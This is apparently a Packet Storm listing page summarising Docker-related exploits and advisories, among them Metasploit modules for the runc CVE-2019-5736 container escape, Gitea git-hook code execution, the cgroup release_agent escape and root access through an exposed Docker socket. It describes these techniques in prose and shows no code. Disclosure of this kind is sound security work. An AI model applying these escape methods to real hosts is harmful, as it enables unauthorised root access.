Docker versions prior to 1.6.1 suffer from privilege escalation and information disclosure vulnerabilities.
95ee351837d4eafc2ac444cb87bd4b716e7c5f58566ada9fb56a9b758dee33ccThis Metasploit module leverages a flaw in runc to escape a Docker container and get command execution on the host as root. This vulnerability is identified as CVE-2019-5736. It overwrites the runc binary with the payload and waits for someone to use docker exec to get into the container. This will trigger the payload execution. Note that executing this exploit carries important risks regarding the Docker installation integrity on the target and inside the container.
cccb41227aca832e89e9a6f586e66617bdec002e1dded9d5addd44548302edb1This Metasploit module leverages an insecure setting to get remote code execution on the target OS in the context of the user running Gitea. This is possible when the current user is allowed to create git hooks, which is the default for administrative users. For non-administrative users, the permission needs to be specifically granted by an administrator. To achieve code execution, the module authenticates to the Gitea web interface, creates a temporary repository, sets a post-receive git hook with the payload and creates a dummy file in the repository. This last action will trigger the git hook and execute the payload. Everything is done through the web interface. It has been mitigated in version 1.13.0 by setting the Gitea DISABLE_GIT_HOOKS configuration setting to true by default. This disables this feature and prevents all users (including admin) from creating custom git hooks. This module has been tested successfully against docker versions 1.12.5, 1.12.6 and 1.13.6 with DISABLE_GIT_HOOKS set to false, and on version 1.12.6 on Windows.
777838a8c7aba78aa158817a5091acfd7337de3556b2fc8c26c13ab9c90a1621This Metasploit module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release feature. This exploit should work against any container started with the following flags: --cap-add=SYS_ADMIN, --privileged.
96e3dd9d2191efa268a444e84e7547c50e9a4480e50aec7c0ffb4d80ebaaaf32This Metasploit module exploit leverages a vulnerability in Docker Desktop Community Edition versions prior to 2.1.0.1 where an attacker can write a payload to a lower-privileged area to be executed automatically by the docker user at login.
eaa66458a1be58495d72ac8518ba2b5c7ce4adda66caa2a735da2834489bbc19Proof of concept instructions to exploit a Docker container escape vulnerability.
59a356c08ff9521c88b5300d8e1a4bce79db65704f01e01b54cbd581fecab881Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp with tls but without tls-auth), an attacker can create a Docker container with the '/' path mounted with read/write permissions on the host server that is running the Docker container. As the Docker container executes command as uid 0 it is honored by the host operating system allowing the attacker to edit/create files owned by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server. The Docker image should exist on the target system or be a valid image from hub.docker.com.
5eef6332da7f2e3eafd6c25adcb58e15c04382cde4fdec2987c6b2d85ab64dfeDocker Engine versions prior to 1.12.6 suffer from an insecure open of a file descriptor.
c6dd4934c055006df86b6145b7e548b07287014ac26ce1af46e0b6fa783d1157Docker versions 1.11.2 and below suffer from an issue where a forged VXLAN packet can be leveraged to scan services that are not exposed.
a4e4a57ace4ef27819179237d6afd95b851a2dcb97baf0583bc8133f4f80246aThis Metasploit module obtains root privileges from any host account with access to the Docker daemon. Usually this includes accounts in the docker group.
21635da937bd87b43dde24314b9ad467daff6d045814c41f0388dc2c1020eeb3Docker version 1.3.3 has been released to address privilege escalation, path traversal, and spoofing vulnerabilities.
8500831f87dd1053a5b03c9bb78a961217c43693b105c24e9149353125d6553aDocker versions prior to 1.3.2 suffer from privilege and container escalation vulnerabilities.
f3ea689d0955e5745699f82d7c1d878c1c96110a77a052bec055fa5cc225fbc5
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed